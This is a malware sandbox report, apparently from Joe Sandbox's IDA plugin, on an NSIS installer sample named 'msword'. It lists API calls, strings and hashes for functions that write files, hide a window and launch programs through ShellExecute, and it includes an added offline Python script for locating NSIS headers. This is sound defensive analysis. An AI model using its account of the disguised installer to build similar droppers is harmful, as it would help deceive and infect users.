                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            • lstrcatW.KERNEL32(00000000,00000000,TargetedRejectAccomplishComicsEngagementRendered,004CB0B0,00000000,00000000), ref: 00401A76
                                                                            • CompareFileTime.KERNEL32(-00000014,?,TargetedRejectAccomplishComicsEngagementRendered,TargetedRejectAccomplishComicsEngagementRendered,00000000,00000000,TargetedRejectAccomplishComicsEngagementRendered,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                              • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                              • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                              • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                            • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$TargetedRejectAccomplishComicsEngagementRendered
                                                                            • API String ID: 4286501637-1929300520
                                                                            • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                            • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                            • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                            • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                                            Control-flow Graph

                                                                            • Control-flow graph image not recoverable from text. Function 00403587, basic blocks 00403587-004037CA; API calls on the graph: GetTickCount, GetModuleFileNameW, GetFileSize, GlobalAlloc, SetFilePointer; internal calls: 00405E50, 00406009, 00406751, 004032D2, 00403336, 00403368, 0040337F, 00405E0C, 00407281.
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00403598
                                                                            • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                              • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                              • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                            • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                            Strings
                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                            • Inst, xrefs: 0040366C
                                                                            • soft, xrefs: 00403675
                                                                            • Error launching installer, xrefs: 004035D7
                                                                            • Null, xrefs: 0040367E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                            • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                            • API String ID: 4283519449-527102705
                                                                            • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                            • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                            • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                            • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
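The function at 00403587 is the NSIS stub's self-header scan: it resolves its own image path (GetModuleFileNameW), opens it (GetFileAttributesW, CreateFileW), takes its size (GetFileSize) and compares the file contents against the constant dwords 'Null', 'soft' and 'Inst' referenced at 0040367E, 00403675 and 0040366C; the "Installer integrity check has failed" message at 004037C5 sits on the failure path. The Python below is an added example, not part of the Joe Sandbox report and not NSIS code, that reproduces the locate step offline so a dropped PE like this one can be triaged without running it. It parses the NSIS firstheader layout (flags, the 0xDEADBEEF signature, the 12-byte "NullsoftInst" tag, length_of_header and length_of_all_following_data, with the flag bit names as in the NSIS headers) and reports whether bytes have been appended after the block the header accounts for. The sample bytes, the fake stub prefix and the 4-byte scan step are assumptions of the example, not values observed in this sample.

```python
"""Locate the NSIS firstheader inside an installer image (added example)."""
import struct
from typing import NamedTuple, Optional

# Constants from the NSIS firstheader layout (exehead/fileform.h).
FH_SIG = 0xDEADBEEF
FH_MAGIC = b"NullsoftInst"          # stored as the three dwords 'Null' 'soft' 'Inst'
FH_FLAGS_MASK = 0xF
FH_FLAG_NAMES = {1: "UNINSTALL", 2: "SILENT", 4: "NO_CRC", 8: "FORCE_CRC"}
FIRSTHEADER_FMT = "<II12sII"        # flags, siginfo, nsinst[3], length_of_header, length_of_all_following_data
FIRSTHEADER_SIZE = struct.calcsize(FIRSTHEADER_FMT)   # 28 bytes


class FirstHeader(NamedTuple):
    offset: int                      # file offset of the firstheader
    flags: int
    length_of_header: int
    length_of_all_following_data: int
    trailing_bytes: int              # bytes past the block the header accounts for


def find_nsis_firstheader(data: bytes, step: int = 4) -> Optional[FirstHeader]:
    """Scan `data` for an NSIS firstheader; return None if there is none.

    Assumption of this example: every `step`-aligned offset is tested rather
    than reproducing the stub's own chunked stepping, so the header is found
    wherever a packer or an appended overlay has moved it.
    """
    for off in range(0, len(data) - FIRSTHEADER_SIZE + 1, step):
        flags, sig, magic, hlen, total = struct.unpack_from(FIRSTHEADER_FMT, data, off)
        if sig != FH_SIG or magic != FH_MAGIC:
            continue
        if flags & ~FH_FLAGS_MASK:   # reserved flag bits set: not a real header
            continue
        if total < FIRSTHEADER_SIZE or total > len(data) - off:
            continue                 # claims more data than the file holds
        return FirstHeader(off, flags, hlen, total, len(data) - off - total)
    return None


def flag_names(flags: int) -> list:
    """Decode the low flag bits into their NSIS names."""
    return [name for bit, name in FH_FLAG_NAMES.items() if flags & bit]


def build_sample(flags: int = 0, stub_len: int = 0x800, header_len: int = 0x40,
                 payload_len: int = 0x100, appended: bytes = b"") -> bytes:
    """Constructed test input (not a real installer): filler standing in for
    the stub, then a firstheader, a header block, a datablock and optionally
    bytes appended after the installer data."""
    total = FIRSTHEADER_SIZE + header_len + payload_len
    fh = struct.pack(FIRSTHEADER_FMT, flags, FH_SIG, FH_MAGIC, header_len, total)
    stub = b"MZ" + b"\x90" * (stub_len - 2)          # not a valid PE, just filler
    return stub + fh + b"H" * header_len + b"D" * payload_len + appended


def triage(data: bytes) -> str:
    """One-line verdict a triage script would log for a dropped file."""
    fh = find_nsis_firstheader(data)
    if fh is None:
        return "no NSIS firstheader found"
    if fh.trailing_bytes == 0:
        trailer = "clean trailer"
    else:
        trailer = f"{fh.trailing_bytes} bytes appended after the installer data"
    return (f"NSIS firstheader at 0x{fh.offset:X}, flags={flag_names(fh.flags) or ['none']}, "
            f"header_len=0x{fh.length_of_header:X}, "
            f"total=0x{fh.length_of_all_following_data:X}, {trailer}")


if __name__ == "__main__":
    print(triage(build_sample()))
    print(triage(build_sample(flags=0x2 | 0x4, appended=b"overlay" * 8)))
    print(triage(b"MZ" + b"\x00" * 4096))
```

Run it against the PE dumped from the 0x00400000 region to confirm the stub carries an NSIS payload and to see whether anything was appended beyond what the firstheader declares; a nonzero trailing count is worth a closer look, since the stub's own check is what decides whether the "Installer integrity check has failed" path is taken.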

                                                                            Control-flow Graph

                                                                            • Control-flow graph image not recoverable from text. Function 0040337F, basic blocks 0040337F-00403585; API calls on the graph: GetTickCount, MulDiv, wsprintfW, WriteFile; internal calls: 00403336, 00403368, 004072F2, 00407312, 00404F72.
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 004033E7
                                                                            • GetTickCount.KERNEL32 ref: 00403464
                                                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                            • wsprintfW.USER32 ref: 004034A4
                                                                            • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                            • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: CountFileTickWrite$wsprintf
                                                                            • String ID: ... %d%%$P1B$X1C$X1C
                                                                            • API String ID: 651206458-1535804072
                                                                            • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                            • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                            • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                            • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                                            Control-flow Graph

                                                                            • Control-flow graph image not recoverable from text. Function 00404F72, basic blocks 00404F72-00405044; API calls on the graph: lstrlenW, lstrcatW, SetWindowTextW, SendMessageW (three calls); internal call: 00406805.
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                            • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                            • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                            • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                              • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                            • String ID:
                                                                            • API String ID: 2740478559-0
                                                                            • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                            • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                            • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                            • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                                                            Control-flow Graph

                                                                            • Control-flow graph image not recoverable from text. Function 00401EB9, basic blocks from 00401EB9 with the shared exit at 004030E3-004030F2 and the GlobalFree block at 00402387-0040238D; API calls on the graph: GlobalAlloc, GlobalFree; internal calls: 004062A3, 00406805, 00406009.
                                                                            APIs
                                                                              • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                            • GlobalFree.KERNELBASE(005A6820), ref: 00402387
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: FreeGloballstrcpyn
                                                                            • String ID: hZ$Exch: stack < %d elements$Pop: stack empty$TargetedRejectAccomplishComicsEngagementRendered
                                                                            • API String ID: 1459762280-4085635947
                                                                            • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                            • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                            • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                            • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                                            Control-flow Graph

                                                                            • Control-flow graph image not recoverable from text. Function 004022FD, basic blocks 004022FD-0040238D with the shared exit at 004030E3-004030F2; API calls on the graph: GetFileVersionInfoSizeW, GlobalAlloc, GetFileVersionInfoW, VerQueryValueW, GlobalFree; internal calls: 0040145C, 00405F51 (twice).
                                                                            APIs
                                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                            • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                            • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                              • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                            • GlobalFree.KERNELBASE(005A6820), ref: 00402387
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                            • String ID:
                                                                            • API String ID: 3376005127-0

                                                                            Control-flow Graph (graph image not captured; legend: Executed / Not Executed; function entry block at 402b23)
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                            • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                            • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                            Similarity
                                                                            • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                            • String ID:
                                                                            • API String ID: 2568930968-0

                                                                            Control-flow Graph (graph image not captured; legend: Executed / Not Executed; function entry block at 402713)
                                                                            APIs
                                                                              • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                            Strings
                                                                            • <RM>, xrefs: 00402713
                                                                            • TargetedRejectAccomplishComicsEngagementRendered, xrefs: 00402770
                                                                            • WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringWritelstrcpyn
                                                                            • String ID: <RM>$TargetedRejectAccomplishComicsEngagementRendered$WriteINIStr: wrote [%s] %s=%s in %s
                                                                            • API String ID: 247603264-3745045155

                                                                            Control-flow Graph (graph image not captured; legend: Executed / Not Executed; function entry block at 4021b5)
                                                                            APIs
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                              • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                              • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                            • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            Strings
                                                                            • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                            • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                            Similarity
                                                                            • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                            • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                            • API String ID: 3156913733-2180253247
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00405E9D
                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                            Similarity
                                                                            • API ID: CountFileNameTempTick
                                                                            • String ID: nsa
                                                                            • API String ID: 1716503409-2209301699
                                                                            APIs
                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                            Similarity
                                                                            • API ID: Window$EnableShowlstrlenwvsprintf
                                                                            • String ID: HideWindow
                                                                            • API String ID: 1249568736-780306582
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                            • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                            • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                            • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                            • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                            • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                            • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
APIs
• GlobalFree.KERNELBASE(?), ref: 004073C5
• GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
• GlobalFree.KERNELBASE(?), ref: 0040743D
• GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
Memory Dump Source
• Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msword.jbxd
Similarity
• API ID: Global$AllocFree
• String ID:
• API String ID: 3394109436-0
APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
• SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
Memory Dump Source
• Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msword.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
Memory Dump Source
• Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msword.jbxd
Similarity
• API ID: File$AttributesCreate
